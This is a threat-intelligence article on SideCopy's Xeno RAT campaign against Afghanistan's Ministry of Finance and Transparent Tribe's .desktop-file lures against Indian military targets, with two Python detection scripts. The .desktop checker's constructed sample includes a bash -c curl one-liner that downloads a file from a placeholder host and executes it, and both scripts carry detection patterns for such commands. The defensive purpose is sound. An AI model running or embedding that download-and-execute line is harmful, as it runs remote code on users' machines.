- The Pakistan-aligned SideCopy group deployed a sophisticated spear-phishing campaign codenamed Operation XENOFISCAL against Afghanistan’s Ministry of Finance.
- The attackers used a malicious ZIP archive containing a Pashto-language LNK file to deliver the open-source remote access trojan Xeno RAT, establishing persistent control.
- In a related campaign, the broader Transparent Tribe (APT36) umbrella targeted Indian military infrastructure using weaponized Linux .desktop files and a Golang-based implant called DeskRAT.
In early June 2026, cybersecurity researchers uncovered a targeted cyber espionage campaign by the Pakistan-aligned SideCopy group, which successfully compromised Afghanistan’s Ministry of Finance using a sophisticated remote access trojan. The attack, detailed by Seqrite Labs researcher Dixit Panchal, deployed a persistent version of the open-source Xeno RAT malware against Afghan government officials.
“The campaign opens with a spear phishing delivery – a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,” Panchal said in a technical breakdown. This deliberate linguistic choice reflected the attackers’ deep familiarity with their target environment within Afghan government circles.
Once opened, the malicious Windows shortcut fetched a remote HTML Application (HTA) from a compromised education-sector domain and executed obfuscated JavaScript. The malware then established persistence by registering itself in the Registry under a name mimicking Microsoft Edge, before dropping the final Xeno RAT payload alongside a decoy document.
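The chain above (shortcut launches a script host that pulls a remote HTA, then a Run-key entry named after a legitimate browser) is a shape defenders can look for in endpoint telemetry. The following is an added illustration written for this page, not tooling from Seqrite Labs or the report; the event dictionaries are constructed in a Sysmon-like layout, and the domain, paths and value names in them are placeholders rather than indicators from the campaign.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not from the report): one process-creation
# event and two Run-key writes, in the shape an EDR or Sysmon pipeline emits.
SAMPLE_EVENTS = [
    {
        "type": "process_create",
        "parent_image": r"C:\Windows\explorer.exe",          # user double-clicked a shortcut
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'"C:\Windows\System32\mshta.exe" https://edu.example/lure.hta',
    },
    {
        "type": "registry_set",
        "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
        "value_name": "Microsoft Edge",                        # name borrowed from the browser
        "value_data": r"C:\Users\u\AppData\Roaming\MicrosoftEdge\msedge.exe",  # but not the install dir
    },
    {
        "type": "registry_set",
        "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
        "value_name": "Microsoft Edge Update",
        "value_data": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
    },
]

# A remote .hta argument handed to mshta.exe.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

# Directories where a genuine Edge binary lives on a default install (lower-cased).
LEGIT_EDGE_DIRS = (
    r"c:\program files\microsoft\edge\application",
    r"c:\program files (x86)\microsoft\edge\application",
)

def is_remote_hta_launch(ev):
    """mshta.exe started from the shell with a remote HTA URL on its command line."""
    if ev.get("type") != "process_create":
        return False
    image = PureWindowsPath(ev["image"]).name.lower()
    parent = PureWindowsPath(ev["parent_image"]).name.lower()
    return (
        image == "mshta.exe"
        and parent == "explorer.exe"
        and bool(REMOTE_HTA.search(ev["command_line"]))
    )

def is_edge_lookalike_run_value(ev):
    """Run-key value whose name invokes Edge but whose target is outside Edge's install path."""
    if ev.get("type") != "registry_set":
        return False
    if not ev["key"].lower().endswith(r"\currentversion\run"):
        return False
    if "edge" not in ev["value_name"].lower():
        return False
    # Drop a leading quote so a quoted path still matches the directory prefix.
    target = ev["value_data"].strip('"').lower()
    return not any(target.startswith(d) for d in LEGIT_EDGE_DIRS)

def triage(events):
    """Return (finding_name, detail) tuples for events matching either heuristic."""
    findings = []
    for ev in events:
        if is_remote_hta_launch(ev):
            findings.append(("remote_hta_from_shortcut", ev["command_line"]))
        elif is_edge_lookalike_run_value(ev):
            findings.append(("edge_lookalike_persistence", ev["value_name"]))
    return findings

if __name__ == "__main__":
    for name, detail in triage(SAMPLE_EVENTS):
        print(f"{name}: {detail}")
```

The two heuristics are deliberately narrow: the first only fires when the script host is a direct child of the shell, which is what a double-clicked LNK produces, and the second compares the Run value's target against the known Edge install directories rather than trusting the value name. Both are starting points to tune against your own baseline, not a complete signature for this actor.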
The remote access trojan is equipped with extensive capabilities, including executing commands, logging keystrokes, taking screenshots, and performing network tunneling. Meanwhile, a separate but related phishing operation leveraging weaponized Linux .desktop files targeted Indian military infrastructure, according to security researcher R.D. Tarun.
This broader campaign, assessed to be the work of Transparent Tribe, used contract-related lures associated with Indian armored-vehicle procurement. “The campaign appears to target individuals connected to Indian military and defense infrastructure ecosystems using WhatsApp-based social engineering,” Tarun noted in a recent report.
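A weaponized .desktop file is a plain-text launcher, so the lure's behaviour is visible before anyone clicks it. Because the report excerpt above does not describe the internals of the files used against Indian targets, the checker below is a generic illustration added for this page rather than the researcher's or any vendor's tooling; the two .desktop entries are constructed samples, and the download URL in the suspicious one is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample (not from the report): an Application entry dressed up as a
# document that silently runs a shell one-liner fetching something from the network.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Procurement_Contract.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p -o /tmp/.p && chmod +x /tmp/.p && /tmp/.p"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Terminal=false
Exec=gnome-text-editor %U
"""

def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return key/value pairs from the [Desktop Entry] group; other groups are ignored."""
    entry: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

DOC_EXTS = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)$", re.IGNORECASE)
SHELL_WRAPPER = re.compile(r"\b(ba|z|da)?sh\s+-c\b")   # sh -c / bash -c / zsh -c / dash -c
DOWNLOADER = re.compile(r"\b(curl|wget)\b")

def assess_desktop_entry(text: str) -> List[str]:
    """Return the list of reasons a .desktop file looks like a lure (empty if none)."""
    e = parse_desktop_entry(text)
    reasons: List[str] = []
    exec_line = e.get("Exec", "")
    if SHELL_WRAPPER.search(exec_line):
        reasons.append("exec_wraps_shell")
    if DOWNLOADER.search(exec_line):
        reasons.append("exec_downloads_from_network")
    looks_like_document = bool(DOC_EXTS.search(e.get("Name", ""))) or "pdf" in e.get("Icon", "").lower()
    if e.get("Type") == "Application" and looks_like_document:
        reasons.append("application_masquerading_as_document")
    # A shell wrapper with Terminal=false runs with no window for the user to notice.
    if "exec_wraps_shell" in reasons and e.get("Terminal", "true").lower() == "false":
        reasons.append("shell_runs_without_terminal")
    return reasons

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, assess_desktop_entry(text) or "clean")
```

The same function can be pointed at files arriving in `~/Downloads` or at mail-gateway attachments; a document-named entry of `Type=Application` is by itself worth quarantining for review, since legitimate launchers have no reason to carry a `.pdf` or `.docx` name.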